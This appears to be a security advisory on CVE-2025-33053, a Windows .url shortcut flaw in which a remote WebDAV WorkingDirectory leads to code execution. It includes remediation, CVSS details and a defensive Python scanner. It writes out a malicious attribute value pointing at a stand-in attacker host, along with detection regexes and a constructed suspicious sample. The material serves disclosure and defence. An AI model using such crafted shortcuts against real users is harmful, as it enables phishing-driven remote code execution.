CVE-2025-33053 — Microsoft Windows External Control of File Name or Path Vulnerability


Microsoft Windows — .url File WorkingDirectory WebDAV Code Execution; June 2025 Patch Tuesday Zero-Day

What is the Windows Internet Shortcut (.url) File Format?

Windows Internet Shortcut files (.url) are configuration files that Windows Explorer uses to represent web browser bookmarks and shortcuts on the desktop or in folders. When a user double-clicks a .url file, Windows opens the URL it contains in the default browser. The .url file format supports several configuration attributes including URL=, WorkingDirectory=, and IconFile=. Threat actors regularly weaponize .url and .lnk files in phishing attacks because they can be crafted to execute code when opened.

Overview

CVE-2025-33053 is an external control of file name or path vulnerability (CWE-73) in Windows Internet Shortcut (.url) file handling. When a user opens a crafted .url file, the WorkingDirectory attribute causes Windows to connect to an attacker-controlled WebDAV server and execute code from that remote location. Only one user action is required — double-clicking the .url file — making it a practical phishing payload. It was disclosed as a zero-day in the June 2025 Patch Tuesday.

Affected Versions

| Product | Vulnerable | Fixed |
|---|---|---|
| Windows 10 / 11 (all supported versions) | Before June 2025 cumulative update | June 2025 cumulative update |
| Windows Server 2019–2025 | Before June 2025 cumulative update | June 2025 cumulative update |

Technical Details

The .url file format's WorkingDirectory attribute specifies the working directory for the shortcut's target. When Windows processes a .url file containing WorkingDirectory=\\attacker.com\share, Windows automatically connects to the specified UNC path via WebDAV (or SMB). If the attacker's WebDAV server hosts a malicious file at a path that Windows then executes as part of resolving the working directory context, code execution occurs.

This vulnerability class is related to the well-documented pattern of .lnk and .url file abuse for phishing. The CWE-73 (External Control of File Name or Path) classification reflects that the application trusts an externally supplied path value without sufficient validation.

Exploitation characteristics:

  • The victim must open the .url file (single click in some email clients, double-click in Explorer)
  • No authentication required from the attacker
  • The .url file can be delivered via email, web download, USB, or network share
  • Works across all user privilege levels — no admin rights required on the victim
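A triage check that a mail gateway or hunt script could run over .url files to flag the remote WorkingDirectory pattern described above. This is an added example, not code from the advisory or from Microsoft; the function names are hypothetical, the host names and sample files are constructed, and it goes beyond the advisory by also matching the \\host@SSL\... WebDAV form and file://host/... paths.

```python
import configparser
import re

# Attributes of the .url format named on this page (configparser lowercases keys).
PATH_KEYS = ("url", "workingdirectory", "iconfile")
# \\host\share, plus the WebDAV redirector forms \\host@SSL\... and \\host@8080\...
UNC_RE = re.compile(r"^[\\/]{2}(?P<host>[^\\/@]+)(?P<dav>@[^\\/]+)?[\\/]")
# file://host/share also reaches a remote host; file:///C:/... is local.
FILE_RE = re.compile(r"^file:[\\/]{2}(?P<host>[^\\/]+)[\\/]", re.IGNORECASE)

def remote_target(value):
    """Return (host, transport) if value points at another machine, else None."""
    value = value.strip().strip('"')
    m = UNC_RE.match(value)
    if m:
        return m.group("host"), "WebDAV" if m.group("dav") else "SMB or WebDAV"
    m = FILE_RE.match(value)
    if m and m.group("host").lower() != "localhost":
        return m.group("host"), "SMB or WebDAV"
    return None

def scan_url_file(text):
    """Return [(key, host, transport)] for remote paths in a .url file body."""
    parser = configparser.ConfigParser(
        interpolation=None, strict=False, delimiters=("=",))
    try:
        parser.read_string(text)
    except configparser.Error:
        return [("<unparseable>", "", "")]  # quarantine rather than trust
    findings = []
    for section in parser.sections():
        for key in PATH_KEYS:
            hit = remote_target(parser.get(section, key, fallback=""))
            if hit:
                findings.append((key, *hit))
    return findings

# Constructed samples; the host names are placeholders, not real indicators.
BENIGN = r"""[InternetShortcut]
URL=https://www.example.com/docs
IconFile=C:\Windows\System32\shell32.dll
"""
SUSPICIOUS = r"""[InternetShortcut]
URL=https://www.example.com/
WorkingDirectory=\\webdav.example.test\share
"""

if __name__ == "__main__":
    print(scan_url_file(BENIGN), scan_url_file(SUSPICIOUS))
```

An empty result means no remote path was found in the three attributes; it is not a verdict that the file is safe.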

Discovery

The vulnerability was exploited in the wild before the June 2025 Patch Tuesday. The specific threat actor and reporter were not publicly disclosed.

Exploitation Context

This type of .url file exploitation is a staple of phishing campaigns, particularly from Russian-nexus threat actors who have historically abused .lnk and .url files to bypass Mark of the Web (MotW) protections and deliver malware. The zero-day status indicates the technique was actively used in targeted attacks before the patch.

Remediation

  1. Apply the June 2025 cumulative update for your Windows version immediately. The CISA deadline was July 1, 2025.
  2. Configure email gateways to strip or quarantine .url file attachments — these files have no legitimate use as email attachments.
  3. Block WebDAV outbound connections at the perimeter firewall where possible (TCP ports 80/443 to external WebDAV servers); note that blocking all HTTP/HTTPS is impractical.
  4. Enable Attack Surface Reduction (ASR) rules in Microsoft Defender that block untrusted or unsigned processes from running from USB or downloaded files.
  5. Train users to treat .url files as executable content equivalent to .exe files — clicking them can run code.

Key Details

| Property | Value |
|---|---|
| CVE ID | CVE-2025-33053 |
| Vendor / Product | Microsoft — Windows |
| NVD Published | 2025-06-10 |
| NVD Last Modified | 2025-10-27 |
| CVSS 3.1 Score | 8.8 |
| CVSS 3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| Severity | HIGH |
| CWE | CWE-73 |
| CISA KEV Added | 2025-06-10 |
| CISA KEV Deadline | 2025-07-01 |
| Known Ransomware Use | No |

CVSS 3.1 Breakdown

| Metric | Value |
|---|---|
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | Required |
| Scope | Unchanged |
| Confidentiality | High |
| Integrity | High |
| Availability | High |

Required Action

CISA BOD 22-01 Deadline: 2025-07-01. Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.

Timeline

| Date | Event |
|---|---|
| 2025-06-10 | Patched in June 2025 Patch Tuesday; CISA adds to KEV (zero-day exploited before patch) |
| 2025-07-01 | CISA BOD 22-01 remediation deadline |